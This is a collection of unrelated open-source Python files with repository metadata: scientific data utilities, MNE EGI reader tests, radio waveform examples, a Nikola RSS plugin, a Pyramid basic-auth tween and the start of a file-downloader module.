values_uniform = np.linspace(values_sorted[0], values_sorted[-1], len(values_sorted))
f = scipy.interpolate.interp1d(values_sorted, values_uniform, bounds_error=False, fill_value=0.)
output_values = f(cell_dist)
output_values -= output_values.min()
output_values /= output_values.max()
return output_values
def _get_slice(data, idx, los_axis, slice_depth=1):
'''
Slice a data cube along a given axis. For internal use.
'''
assert len(data.shape) == 3 or len(data.shape) == 4
assert los_axis >= 0 and los_axis < 3
idx1 = idx
idx2 = idx1+slice_depth
if len(data.shape) == 3: #scalar field
if los_axis == 0:
return np.squeeze(data[idx1:idx2,:,:])
elif los_axis == 1:
return np.squeeze(data[:,idx1:idx2,:])
return np.squeeze(data[:,:,idx1:idx2])
else: #Vector field
if los_axis == 0:
return np.squeeze(data[:,idx1:idx2,:,:])
elif los_axis == 1:
return np.squeeze(data[:,:,idx1:idx2,:])
return np.squeeze(data[:,:,:,idx1:idx2])
def _get_filenames(filenames_in):
'''
If filenames_in is a list of files, return as it is
If it is a directory, make sure it only contains data files,
then return the list of files in the directory
If it is a text file, read the list of files from the file
'''
if hasattr(filenames_in, '__iter__'):
filenames_out = filenames_in
elif os.path.isdir(filenames_in):
files_in_dir = glob.glob(filenames_in + '/*')
extensions = [os.path.splitext(f)[-1] for f in files_in_dir]
if not _all_same(extensions):
raise Exception('The directory may only contain one file type.')
filenames_out = files_in_dir
elif os.path.isfile(filenames_in):
f = open(filenames_in)
names = [l.strip() for l in f.readlines()]
f.close()
filenames_out = names
else:
raise Exception('Invalid filenames input')
return np.array(filenames_out)
def _get_file_redshifts(redshifts_in, filenames):
'''
If redshifts_in is None, try to determine from file names
If it's a directory, read the redshifts
Else, return as is
'''
if hasattr(redshifts_in, '__iter__'):
redshifts_out = redshifts_in
elif redshifts_in is None:
redshifts_out = [determine_redshift_from_filename(f) for f in filenames]
redshifts_out = np.array(redshifts_out)
elif os.path.exists(redshifts_in):
redshifts_out = np.loadtxt(redshifts_in)
else:
raise Exception('Invalid data for file redshifts.')
return redshifts_out
def _all_same(items):
return all(x == items[0] for x in items)
| 39.601307 | 116 | 0.643561 |
2d8a82911a67282c126d2c5f110f339b65bec27f | 2,462 | py | Python | s_tsvd_smlb.py | GrzegorzMika/Morozov-in-Poisson-Processes | cd1ea799fbc49a74c442df5af1bb2390539390a5 | [
"MIT"
] | null | null | null | s_tsvd_smlb.py | GrzegorzMika/Morozov-in-Poisson-Processes | cd1ea799fbc49a74c442df5af1bb2390539390a5 | [
"MIT"
] | null | null | null | s_tsvd_smlb.py | GrzegorzMika/Morozov-in-Poisson-Processes | cd1ea799fbc49a74c442df5af1bb2390539390a5 | [
"MIT"
] | null | null | null | import numpy as np
import pandas as pd
from EstimatorSpectrum import TSVD
from Generator import LSW
from SVD import LordWillisSpektor
from test_functions import kernel_transformed, BIMODAL, BETA, SMLA, SMLB
replications = 10
size = [2000, 10000, 1000000]
max_size = 100
functions = [SMLB]
functions_name = ['SMLB']
taus = [1]
taus_name = ['10']
rhos = [750, 1000, 2000, 3000, 5000, 6000, 7000, 8000, 9000, 10000, 50000, 100000]
rhos_name = ['750', '1000', '2000', '3000', '5000', '6000', '7000', '8000', '9000', '10000', '50000', '100000']
if __name__ == '__main__':
for s in size:
for i, fun in enumerate(functions):
for j, tau in enumerate(taus):
for k, rho in enumerate(rhos):
generator = LSW(pdf=fun, sample_size=s, seed=914)
results = {'selected_param': [], 'oracle_param': [], 'oracle_loss': [], 'loss': [], 'solution': [],
'oracle_solution': []}
for _ in range(replications):
spectrum = LordWillisSpektor(transformed_measure=True)
obs = generator.generate()
tsvd = TSVD(kernel=kernel_transformed, singular_values=spectrum.singular_values,
left_singular_functions=spectrum.left_functions,
right_singular_functions=spectrum.right_functions,
observations=obs, sample_size=s, max_size=max_size, tau=tau,
transformed_measure=True, rho=rho)
tsvd.estimate()
tsvd.oracle(fun, patience=10)
solution = list(tsvd.solution(np.linspace(0, 1, 10000)))
results['selected_param'].append(tsvd.regularization_param)
results['oracle_param'].append(tsvd.oracle_param)
results['oracle_loss'].append(tsvd.oracle_loss)
results['loss'].append(tsvd.residual)
results['solution'].append(solution)
results['oracle_solution'].append(list(tsvd.oracle_solution))
pd.DataFrame(results).to_csv(
'TSVD_rho_{}_tau_{}_size_{}_fun_{}.csv'.format(rhos_name[k], taus_name[j], s,
functions_name[i]))
| 52.382979 | 119 | 0.540211 |
50295356585b3bfaabe24fca61c7d7fc8b621886 | 814 | py | Python | jetset/utils.py | AAGunya/jetset | 53cb0e3e1f308273f19fd4c9b288be12447fd43d | [
"BSD-3-Clause"
] | null | null | null | jetset/utils.py | AAGunya/jetset | 53cb0e3e1f308273f19fd4c9b288be12447fd43d | [
"BSD-3-Clause"
] | null | null | null | jetset/utils.py | AAGunya/jetset | 53cb0e3e1f308273f19fd4c9b288be12447fd43d | [
"BSD-3-Clause"
] | null | null | null |
from __future__ import absolute_import, division, print_function
from builtins import (bytes, str, open, super, range,
zip, round, input, int, pow, object, map, zip)
__author__ = "Andrea Tramacere"
__all__=['check_frame','unexpetced_behaviour']
import re
def check_frame(frame):
allowed=['obs','src','blob']
if frame not in allowed:
raise RuntimeError('rest frame', frame, 'not allowed',allowed)
def unexpetced_behaviour():
raise RuntimeError('the code reached a condition that should never happen!')
def clean_var_name(s):
s.replace('-','_')
s.replace(' ', '_')
# Remove invalid characters
s = re.sub('[^0-9a-zA-Z_]', '', s)
# Remove leading characters until we find a letter or underscore
s = re.sub('^[^a-zA-Z_]+', '', s)
return s | 21.421053 | 80 | 0.653563 |
98702bda979c837225815ddaf23193db02a42c0d | 377 | py | Python | facebook-hacker-cup-2013/beautiful-strings/beautiful-strings.py | robertdimarco/puzzles | 61e1b62700503fdb8794fba7fa5d3156e7adf72b | [
"MIT"
] | 36 | 2015-05-11T20:22:55.000Z | 2021-09-26T07:36:49.000Z | facebook-hacker-cup-2013/beautiful-strings/beautiful-strings.py | robertdimarco/puzzles | 61e1b62700503fdb8794fba7fa5d3156e7adf72b | [
"MIT"
] | null | null | null | facebook-hacker-cup-2013/beautiful-strings/beautiful-strings.py | robertdimarco/puzzles | 61e1b62700503fdb8794fba7fa5d3156e7adf72b | [
"MIT"
] | 16 | 2016-03-08T16:25:46.000Z | 2022-03-16T06:28:51.000Z | #!/usr/bin/env python
import string, sys
m = int(sys.stdin.readline())
for i in range(1, m+1):
score, line = 0, sys.stdin.readline()
line = ''.join(char for char in line.lower() if 'a' <= char <= 'z')
freq = sorted([line.count(char) for char in set(line)])
for j, num in enumerate(freq):
score += num * (26 - len(freq) + j + 1)
print 'Case #%d: %d' % (i, score) | 31.416667 | 69 | 0.596817 |
89f601a4c321a332c6ac92deb2a76e02ea40d16e | 7,218 | py | Python | mne/io/egi/tests/test_egi.py | fmamashli/mne-python | 52f064415e7c9fa8fe243d22108dcdf3d86505b9 | [
"BSD-3-Clause"
] | 1 | 2020-04-25T05:01:54.000Z | 2020-04-25T05:01:54.000Z | mne/io/egi/tests/test_egi.py | fmamashli/mne-python | 52f064415e7c9fa8fe243d22108dcdf3d86505b9 | [
"BSD-3-Clause"
] | 23 | 2017-09-12T11:08:26.000Z | 2019-10-04T11:11:29.000Z | mne/io/egi/tests/test_egi.py | fmamashli/mne-python | 52f064415e7c9fa8fe243d22108dcdf3d86505b9 | [
"BSD-3-Clause"
] | 3 | 2019-01-28T13:48:00.000Z | 2019-07-10T16:02:11.000Z | # -*- coding: utf-8 -*-
# Authors: Denis A. Engemann <denis.engemann@gmail.com>
# simplified BSD-3 license
import os.path as op
import inspect
import numpy as np
from numpy.testing import assert_array_equal, assert_allclose, assert_equal
import pytest
from scipy import io as sio
from mne import find_events, pick_types
from mne.io import read_raw_egi
from mne.io.tests.test_raw import _test_raw_reader
from mne.io.egi.egi import _combine_triggers
from mne.utils import run_tests_if_main
from mne.datasets.testing import data_path, requires_testing_data
FILE = inspect.getfile(inspect.currentframe())
base_dir = op.join(op.dirname(op.abspath(FILE)), 'data')
egi_fname = op.join(base_dir, 'test_egi.raw')
egi_txt_fname = op.join(base_dir, 'test_egi.txt')
@requires_testing_data
def test_io_egi_mff():
"""Test importing EGI MFF simple binary files."""
egi_fname_mff = op.join(data_path(), 'EGI', 'test_egi.mff')
raw = read_raw_egi(egi_fname_mff, include=None)
assert ('RawMff' in repr(raw))
include = ['DIN1', 'DIN2', 'DIN3', 'DIN4', 'DIN5', 'DIN7']
raw = _test_raw_reader(read_raw_egi, input_fname=egi_fname_mff,
include=include, channel_naming='EEG %03d')
assert_equal('eeg' in raw, True)
eeg_chan = [c for c in raw.ch_names if 'EEG' in c]
assert_equal(len(eeg_chan), 129)
picks = pick_types(raw.info, eeg=True)
assert_equal(len(picks), 129)
assert_equal('STI 014' in raw.ch_names, True)
events = find_events(raw, stim_channel='STI 014')
assert_equal(len(events), 8)
assert_equal(np.unique(events[:, 1])[0], 0)
assert (np.unique(events[:, 0])[0] != 0)
assert (np.unique(events[:, 2])[0] != 0)
pytest.raises(ValueError, read_raw_egi, egi_fname_mff, include=['Foo'],
preload=False)
pytest.raises(ValueError, read_raw_egi, egi_fname_mff, exclude=['Bar'],
preload=False)
for ii, k in enumerate(include, 1):
assert (k in raw.event_id)
assert (raw.event_id[k] == ii)
def test_io_egi():
"""Test importing EGI simple binary files."""
# test default
with open(egi_txt_fname) as fid:
data = np.loadtxt(fid)
t = data[0]
data = data[1:]
data *= 1e-6 # μV
with pytest.warns(RuntimeWarning, match='Did not find any event code'):
raw = read_raw_egi(egi_fname, include=None)
assert 'RawEGI' in repr(raw)
data_read, t_read = raw[:256]
assert_allclose(t_read, t)
assert_allclose(data_read, data, atol=1e-10)
include = ['TRSP', 'XXX1']
raw = _test_raw_reader(read_raw_egi, input_fname=egi_fname,
include=include)
assert_equal('eeg' in raw, True)
eeg_chan = [c for c in raw.ch_names if c.startswith('E')]
assert_equal(len(eeg_chan), 256)
picks = pick_types(raw.info, eeg=True)
assert_equal(len(picks), 256)
assert_equal('STI 014' in raw.ch_names, True)
events = find_events(raw, stim_channel='STI 014')
assert_equal(len(events), 2) # ground truth
assert_equal(np.unique(events[:, 1])[0], 0)
assert (np.unique(events[:, 0])[0] != 0)
assert (np.unique(events[:, 2])[0] != 0)
triggers = np.array([[0, 1, 1, 0], [0, 0, 1, 0]])
# test trigger functionality
triggers = np.array([[0, 1, 0, 0], [0, 0, 1, 0]])
events_ids = [12, 24]
new_trigger = _combine_triggers(triggers, events_ids)
assert_array_equal(np.unique(new_trigger), np.unique([0, 12, 24]))
pytest.raises(ValueError, read_raw_egi, egi_fname, include=['Foo'],
preload=False)
pytest.raises(ValueError, read_raw_egi, egi_fname, exclude=['Bar'],
preload=False)
for ii, k in enumerate(include, 1):
assert (k in raw.event_id)
assert (raw.event_id[k] == ii)
@requires_testing_data
def test_io_egi_pns_mff():
"""Test importing EGI MFF with PNS data."""
egi_fname_mff = op.join(data_path(), 'EGI', 'test_egi_pns.mff')
raw = read_raw_egi(egi_fname_mff, include=None, preload=True,
verbose='error')
assert ('RawMff' in repr(raw))
pns_chans = pick_types(raw.info, ecg=True, bio=True, emg=True)
assert_equal(len(pns_chans), 7)
names = [raw.ch_names[x] for x in pns_chans]
pns_names = ['Resp. Temperature'[:15],
'Resp. Pressure',
'ECG',
'Body Position',
'Resp. Effort Chest'[:15],
'Resp. Effort Abdomen'[:15],
'EMG-Leg']
_test_raw_reader(read_raw_egi, input_fname=egi_fname_mff,
channel_naming='EEG %03d', verbose='error')
assert_equal(names, pns_names)
mat_names = [
'Resp_Temperature'[:15],
'Resp_Pressure',
'ECG',
'Body_Position',
'Resp_Effort_Chest'[:15],
'Resp_Effort_Abdomen'[:15],
'EMGLeg'
]
egi_fname_mat = op.join(data_path(), 'EGI', 'test_egi_pns.mat')
mc = sio.loadmat(egi_fname_mat)
for ch_name, ch_idx, mat_name in zip(pns_names, pns_chans, mat_names):
print('Testing {}'.format(ch_name))
mc_key = [x for x in mc.keys() if mat_name in x][0]
cal = raw.info['chs'][ch_idx]['cal']
mat_data = mc[mc_key] * cal
raw_data = raw[ch_idx][0]
assert_array_equal(mat_data, raw_data)
@requires_testing_data
def test_io_egi_pns_mff_bug():
"""Test importing EGI MFF with PNS data (BUG)."""
egi_fname_mff = op.join(data_path(), 'EGI', 'test_egi_pns_bug.mff')
with pytest.warns(RuntimeWarning, match='EGI PSG sample bug'):
raw = read_raw_egi(egi_fname_mff, include=None, preload=True,
verbose='warning')
egi_fname_mat = op.join(data_path(), 'EGI', 'test_egi_pns.mat')
mc = sio.loadmat(egi_fname_mat)
pns_chans = pick_types(raw.info, ecg=True, bio=True, emg=True)
pns_names = ['Resp. Temperature'[:15],
'Resp. Pressure',
'ECG',
'Body Position',
'Resp. Effort Chest'[:15],
'Resp. Effort Abdomen'[:15],
'EMG-Leg']
mat_names = [
'Resp_Temperature'[:15],
'Resp_Pressure',
'ECG',
'Body_Position',
'Resp_Effort_Chest'[:15],
'Resp_Effort_Abdomen'[:15],
'EMGLeg'
]
for ch_name, ch_idx, mat_name in zip(pns_names, pns_chans, mat_names):
print('Testing {}'.format(ch_name))
mc_key = [x for x in mc.keys() if mat_name in x][0]
cal = raw.info['chs'][ch_idx]['cal']
mat_data = mc[mc_key] * cal
mat_data[:, -1] = 0 # The MFF has one less sample, the last one
raw_data = raw[ch_idx][0]
assert_array_equal(mat_data, raw_data)
@requires_testing_data
def test_io_egi_crop_no_preload():
"""Test crop non-preloaded EGI MFF data (BUG)."""
egi_fname_mff = op.join(data_path(), 'EGI', 'test_egi.mff')
raw = read_raw_egi(egi_fname_mff, preload=False)
raw.crop(17.5, 20.5)
raw.load_data()
raw_preload = read_raw_egi(egi_fname_mff, preload=True)
raw_preload.crop(17.5, 20.5)
raw_preload.load_data()
assert_allclose(raw._data, raw_preload._data)
run_tests_if_main()
| 35.732673 | 75 | 0.62829 |
c55ffc99d2d71cb5d3cdd8f7df79bafb297c6b98 | 3,510 | py | Python | examples/nr_create_waveform_batch.py | smooresni/batchwave | d2fb66942aadee142ed5da6ee74f9fc00a6c8720 | [
"MIT"
] | 2 | 2020-08-24T11:23:26.000Z | 2021-07-21T13:22:24.000Z | examples/nr_create_waveform_batch.py | smooresni/batchwave | d2fb66942aadee142ed5da6ee74f9fc00a6c8720 | [
"MIT"
] | null | null | null | examples/nr_create_waveform_batch.py | smooresni/batchwave | d2fb66942aadee142ed5da6ee74f9fc00a6c8720 | [
"MIT"
] | 1 | 2021-07-21T13:22:27.000Z | 2021-07-21T13:22:27.000Z | """
This example shows how to create multiple waveforms by sweeping various parameters.
"""
import wfmcreator
from wfmcreator import nr
carrier_counts = [1, 2, 4, 8]
channel_bandwidths = [20e6, 50e6, 100e6]
subcarrier_spacings = [30e3]
modulation_schemes = [nr.PuschModulationType.QPSK, nr.PuschModulationType.QAM16,
nr.PuschModulationType.QAM64, nr.PuschModulationType.QAM256]
# waveform
nrw = nr.Waveform()
nrw.auto_increment_cell_id_enabled = True
# waveform creator
wc = wfmcreator.WaveformCreator()
# subblock
subblock = nrw.subblocks[0]
subblock.offset = 0.0
subblock.spacing_type = nr.SubblockSpacingType.NOMINAL
subblock.reference_cc_index = -1
# carrier
for num_carriers in carrier_counts:
del subblock.carriers
subblock.num_carriers = num_carriers
for bandwidth in channel_bandwidths:
for scs in subcarrier_spacings:
for modulation in modulation_schemes:
for carrier in subblock.carriers:
carrier.cell_id = 0
carrier.frequency_range = nr.FrequencyRange.RANGE_1
carrier.link_direction = nr.LinkDirection.UPLINK
carrier.downlink_channel_configuration_mode = nr.DownlinkChannelConfigurationMode.USER_DEFINED
carrier.downlink_test_model = nr.DownlinkTestModel.TM1_1
carrier.downlink_test_model_duplex_scheme = nr.DownlinkTestModelDuplexScheme.FDD
carrier.channel_bandwidth = bandwidth
carrier.bandwidth_part_subcarrier_spacing = scs
# pusch
pusch = carrier.pusch[0]
pusch.rb_allocation = '0:last'
pusch.slot_allocation = '0:last'
pusch.symbol_allocation = '0:last'
pusch.modulation_type = modulation
pusch.mapping_type = nr.PuschMappingType.TYPE_A
pusch.dmrs_duration = nr.PuschDmrsDuration.SINGLE_SYMBOL
pusch.dmrs_configuration = nr.PuschDmrsConfiguration.TYPE_1
pusch.dmrs_additional_positions = 0
pusch.dmrs_type_a_position = 2
pusch.transform_precoding_enabled = False
pusch.dmrs_release_version = nr.PuschDmrsReleaseVersion.RELEASE_15
pusch.number_of_cdm_groups = 1
# pdsch
pdsch = carrier.pdsch[0]
pdsch.rb_allocation = '0:last'
pdsch.slot_allocation = '0:last'
pdsch.symbol_allocation = '0:last'
pdsch.modulation_type = nr.PdschModulationType.QAM256
pdsch.mapping_type = nr.PdschMappingType.TYPE_A
pdsch.dmrs_duration = nr.PdschDmrsDuration.SINGLE_SYMBOL
pdsch.dmrs_configuration = nr.PdschDmrsConfiguration.TYPE_1
pdsch.dmrs_additional_positions = 0
pdsch.dmrs_type_a_position = 2
pdsch.transform_precoding_enabled = False
pdsch.dmrs_release_version = nr.PdschDmrsReleaseVersion.RELEASE_15
pdsch.number_of_cdm_groups = 1
# invoke waveform creator
file_name = 'NR_CC{:d}_BW_{:.0f}M_SCS_{:.0f}k_Mod_{:s}.tdms'.format(
num_carriers, bandwidth / 1e6, scs / 1e3, modulation.name)
wfm_path = wc.create(nrw, file_name)
| 45 | 114 | 0.621652 |
32fa2c5ab8bd9ec130f35ee7485dba6e73b151ff | 639 | py | Python | scripts/examples/Arduino/Nicla-Vision/09-Feature-Detection/hog.py | BreederBai/openmv | cb1a97198533dd1201ba8356d1c2f3835b48a347 | [
"MIT"
] | null | null | null | scripts/examples/Arduino/Nicla-Vision/09-Feature-Detection/hog.py | BreederBai/openmv | cb1a97198533dd1201ba8356d1c2f3835b48a347 | [
"MIT"
] | 3 | 2022-03-14T07:15:42.000Z | 2022-03-31T02:52:21.000Z | scripts/examples/Arduino/Nicla-Vision/09-Feature-Detection/hog.py | BreederBai/openmv | cb1a97198533dd1201ba8356d1c2f3835b48a347 | [
"MIT"
] | null | null | null | # Histogram of Oriented Gradients (HoG) Example
#
# This example demonstrates HoG visualization.
#
# Note: Due to JPEG artifacts, the HoG visualization looks blurry. To see the
# image without JPEG artifacts, uncomment the lines that save the image to uSD.
import sensor, image, time
sensor.reset()
sensor.set_framesize(sensor.QVGA)
sensor.set_pixformat(sensor.GRAYSCALE)
sensor.skip_frames(time = 2000)
clock = time.clock() # Tracks FPS.
while (True):
clock.tick()
img = sensor.snapshot()
img.find_hog()
# Uncomment to save raw FB to file and exit the loop
#img.save("/hog.pgm")
#break
print(clock.fps())
| 24.576923 | 79 | 0.719875 |
a9fad7ba6060330d7a0c46a3e463b5ddc871aceb | 4,334 | py | Python | nikola/plugins/task/rss.py | pellenilsson/nikola | 67a944a40b35584525a1bb363b3abd85582704cb | [
"MIT"
] | null | null | null | nikola/plugins/task/rss.py | pellenilsson/nikola | 67a944a40b35584525a1bb363b3abd85582704cb | [
"MIT"
] | null | null | null | nikola/plugins/task/rss.py | pellenilsson/nikola | 67a944a40b35584525a1bb363b3abd85582704cb | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright © 2012-2014 Roberto Alsina and others.
# Permission is hereby granted, free of charge, to any
# person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the
# Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice
# shall be included in all copies or substantial portions of
# the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS
# OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from __future__ import unicode_literals, print_function
import os
try:
from urlparse import urljoin
except ImportError:
from urllib.parse import urljoin # NOQA
from nikola import utils
from nikola.plugin_categories import Task
class GenerateRSS(Task):
"""Generate RSS feeds."""
name = "generate_rss"
def set_site(self, site):
site.register_path_handler('rss', self.rss_path)
return super(GenerateRSS, self).set_site(site)
def gen_tasks(self):
"""Generate RSS feeds."""
kw = {
"translations": self.site.config["TRANSLATIONS"],
"filters": self.site.config["FILTERS"],
"blog_title": self.site.config["BLOG_TITLE"],
"site_url": self.site.config["SITE_URL"],
"blog_description": self.site.config["BLOG_DESCRIPTION"],
"output_folder": self.site.config["OUTPUT_FOLDER"],
"rss_teasers": self.site.config["RSS_TEASERS"],
"rss_plain": self.site.config["RSS_PLAIN"],
"show_untranslated_posts": self.site.config['SHOW_UNTRANSLATED_POSTS'],
"feed_length": self.site.config['FEED_LENGTH'],
"tzinfo": self.site.tzinfo,
"rss_read_more_link": self.site.config["RSS_READ_MORE_LINK"],
"rss_links_append_query": self.site.config["RSS_LINKS_APPEND_QUERY"],
}
self.site.scan_posts()
# Check for any changes in the state of use_in_feeds for any post.
# Issue #934
kw['use_in_feeds_status'] = ''.join(
['T' if x.use_in_feeds else 'F' for x in self.site.timeline]
)
yield self.group_task()
for lang in kw["translations"]:
output_name = os.path.join(kw['output_folder'],
self.site.path("rss", None, lang))
deps = []
if kw["show_untranslated_posts"]:
posts = self.site.posts[:10]
else:
posts = [x for x in self.site.posts if x.is_translation_available(lang)][:10]
for post in posts:
deps += post.deps(lang)
feed_url = urljoin(self.site.config['BASE_URL'], self.site.link("rss", None, lang).lstrip('/'))
task = {
'basename': 'generate_rss',
'name': os.path.normpath(output_name),
'file_dep': deps,
'targets': [output_name],
'actions': [(utils.generic_rss_renderer,
(lang, kw["blog_title"](lang), kw["site_url"],
kw["blog_description"](lang), posts, output_name,
kw["rss_teasers"], kw["rss_plain"], kw['feed_length'], feed_url,
None, kw["rss_links_append_query"]))],
'task_dep': ['render_posts'],
'clean': True,
'uptodate': [utils.config_changed(kw)],
}
yield utils.apply_filters(task, kw['filters'])
def rss_path(self, name, lang):
return [_f for _f in [self.site.config['TRANSLATIONS'][lang],
self.site.config['RSS_PATH'], 'rss.xml'] if _f]
| 41.673077 | 107 | 0.614905 |
adbf9dac85d51e26c24c07483e7bd8fe4bdede09 | 1,187 | py | Python | pyramid_handy/tweens/basic_auth.py | fangpenlin/pyramid-handy | e3cbc19224ab1f0a14aab556990bceabd2d1f658 | [
"MIT"
] | null | null | null | pyramid_handy/tweens/basic_auth.py | fangpenlin/pyramid-handy | e3cbc19224ab1f0a14aab556990bceabd2d1f658 | [
"MIT"
] | null | null | null | pyramid_handy/tweens/basic_auth.py | fangpenlin/pyramid-handy | e3cbc19224ab1f0a14aab556990bceabd2d1f658 | [
"MIT"
] | null | null | null | from __future__ import unicode_literals
import base64
import binascii
def get_remote_user(request):
"""Parse basic HTTP_AUTHORIZATION and return user name
"""
if 'HTTP_AUTHORIZATION' not in request.environ:
return
authorization = request.environ['HTTP_AUTHORIZATION']
try:
authmeth, auth = authorization.split(' ', 1)
except ValueError: # not enough values to unpack
return
if authmeth.lower() != 'basic':
return
try:
auth = base64.b64decode(auth.strip().encode('latin1')).decode('latin1')
except (binascii.Error, TypeError): # can't decode
return
try:
login, password = auth.split(':', 1)
except ValueError: # not enough values to unpack
return
return login, password
def basic_auth_tween_factory(handler, registry):
"""Do basic authentication, parse HTTP_AUTHORIZATION and set remote_user
variable to request
"""
def basic_auth_tween(request):
remote_user = get_remote_user(request)
if remote_user is not None:
request.environ['REMOTE_USER'] = remote_user[0]
return handler(request)
return basic_auth_tween
| 28.261905 | 79 | 0.670598 |
be0baa53cc7bec20e3b5bd473ec706952b85454f | 2,802 | py | Python | mss_customization/install.py | sunhoww/mss_customization | c68dd6ac77a5072b756bd7aba1c4a3c9586cf4e9 | [
"MIT"
] | null | null | null | mss_customization/install.py | sunhoww/mss_customization | c68dd6ac77a5072b756bd7aba1c4a3c9586cf4e9 | [
"MIT"
] | null | null | null | mss_customization/install.py | sunhoww/mss_customization | c68dd6ac77a5072b756bd7aba1c4a3c9586cf4e9 | [
"MIT"
] | 1 | 2018-03-15T13:49:35.000Z | 2018-03-15T13:49:35.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import frappe
settings_accounts = {
'loan_account': {
'account_name': 'Loans on Collateral',
'parent_account': 'Loans and Advances (Assets)',
},
'interest_income_account': {
'account_name': 'Interests on Loans',
'account_type': 'Income Account',
'parent_account': 'Direct Income',
},
'foreclosed_collateral_account': {
'account_name': 'Foreclosed Collateral',
'parent_account': 'Stock Assets',
},
}
def _create_account(doc, company_name, company_abbr):
account = frappe.get_doc({
'doctype': 'Account',
'account_name': doc['account_name'],
'parent_account': "{} - {}".format(
doc['parent_account'], company_abbr
),
'is_group': 0,
'company': company_name,
'account_type': doc.get('account_type'),
}).insert(ignore_if_duplicate=True)
return account.name
def before_tests():
frappe.clear_cache()
if not frappe.db.exists('Company', '_Test Company'):
return
settings = frappe.get_single('MSS Loan Settings')
settings.update({
'months_to_foreclosure': 10,
'mode_of_payment': 'Cash',
})
if frappe.db.exists('Cost Center', 'Main - _TC'):
settings.update({
'cost_center': 'Main - _TC',
})
for key, value in settings_accounts.items():
settings.update({
key: _create_account(value, '_Test Company', '_TC'),
})
settings.save()
frappe.db.commit()
def after_install():
df = frappe.get_meta('Journal Entry Account').get_field('reference_type')
if '\nGold Loan' not in df.options:
doc = frappe.new_doc('Property Setter')
value = df.options + '\nGold Loan'
doc.update({
'doc_type': 'Journal Entry Account',
'doctype_or_field': 'DocField',
'field_name': 'reference_type',
'property': 'options',
'property_type': 'Text',
'value': value
})
doc.insert(ignore_permissions=True)
def after_wizard_complete(args=None):
"""
Create new accounts and set Loan Settings.
"""
if frappe.defaults.get_global_default('country') != "India":
return
settings = frappe.get_doc('MSS Loan Settings', None)
settings.update({
'mode_of_payment': 'Cash',
'cost_center': frappe.db.get_value(
'Company', args.get('company_name'), 'cost_center'
),
})
for key, value in settings_accounts.items():
account_name = _create_account(
value,
args.get('company_name'),
args.get('company_abbr')
)
settings.update({key: account_name})
settings.save()
| 29.808511 | 77 | 0.592434 |
e86c7cb06f3f5a132b086eac50c8282f6b5444ee | 7,143 | py | Python | fastdl/downloader.py | r-salas/fastdl | 8bb63c8b9cf87b0ae7987ffd4b3ae25816007b43 | [
"MIT"
] | 3 | 2021-08-25T09:47:41.000Z | 2021-09-27T03:05:00.000Z | fastdl/downloader.py | r-salas/fastdl | 8bb63c8b9cf87b0ae7987ffd4b3ae25816007b43 | [
"MIT"
] | null | null | null | fastdl/downloader.py | r-salas/fastdl | 8bb63c8b9cf87b0ae7987ffd4b3ae25816007b43 | [
"MIT"
] | 1 | 2021-09-27T03:05:10.000Z | 2021-09-27T03:05:10.000Z | #
#
# Downloader
#
#
import os
import warnings
from .config import conf
from .hasher import validate_file
from .extractor import extract_file, can_extract
from .utils import splitext, guess_extension, filename_from_url
from tqdm.auto import tqdm
from urllib.request import urlopen, Request
from urllib.error import ContentTooShortError
def download(url, fname=None, dir_prefix=None, subdir_prefix="", headers=None, content_disposition=False,
blocksize=1024 * 8, file_hash=None, hash_algorithm="auto", extract=False, extract_dir=None, timeout=None,
progressbar=True, force_download=False, force_extraction=False):
"""
Download files with support for extractions and hash validations.
Parameters
------------
url: str
Url to download
fname: str, optional
File name for the download file. If not provided, it will try to infer filename using
info from the server or the url. Can be an absolute path.
dir_prefix: str
Directory to download files (if `fname` is not an absolute path). By default, it will
download files to current working directory.
subdir_prefix: str
Subdirectory inside `dir_prefix` to store downloaded file.
Useful if configuration for "default_dir_prefix" is changed.
headers: dict, optional
Dictionnary of headers to send during request.
content_disposition: bool
Used only if `fname` is None. If true, try to infer the filename from content disposition. If false, url will
be used to infer filename.
blocksize: int
Response blocks to read / write for every iteration
file_hash: str, optional
File hash to validate file. If hash doesn't match, it will re-download file.
hash_algorithm: str
Hash algorithm to validate file. Currently supported: "sha256", "sha1", "sha512", "md5".
By default, it will try to infer algorithm according to the number of characters of the file
hash.
extract: bool
Whether or not the file should be extracted. The currently supported extensions are the
following: "zip", "tar", "tar.gz", "tar.bz2"
extract_dir: str
Directory to extract files. By default, the directory will be the same as the download file.
timeout: float, optional
Timeout for request.
progressbar: bool
Whether or not show progress bar.
force_download: bool
Whether or not force download if file already exists.
force_extraction: bool
Whether or not force extraction if file already exists.
Returns
--------
file_path: str
Download file path
"""
if dir_prefix is None:
dir_prefix = conf["default_dir_prefix"]
fulldir_prefix = os.path.join(dir_prefix, subdir_prefix)
file_path = _urlretrieve(url, fname=fname, dir_prefix=fulldir_prefix, content_disposition=content_disposition,
headers=headers, blocksize=blocksize, progressbar=progressbar, file_hash=file_hash,
hash_algorithm=hash_algorithm, force_download=force_download, timeout=timeout)
if not extract:
return file_path
if extract_dir is None:
extract_dir, _ = splitext(file_path)
extract_dir = os.path.expanduser(extract_dir)
if not can_extract(file_path):
warnings.warn("`extract=True` but {} can't be extracted".format(file_path))
return file_path
extract_file(file_path, extract_dir, force=force_extraction, progressbar=progressbar)
return file_path
def _warn_about_different_hash(file_hash, hash_algorithm):
warnings.warn("A local file was found, but it seems to be incomplete or outdated because the " +
hash_algorithm + " file hash does not match the original value of " + file_hash +
" so we will re-download the data.")
def _urlretrieve(url, fname=None, dir_prefix=".", headers=None, content_disposition=False, blocksize=1024 * 8,
timeout=None, progressbar=True, reporthook=None, file_hash=None, hash_algorithm="auto",
force_download=False):
"""
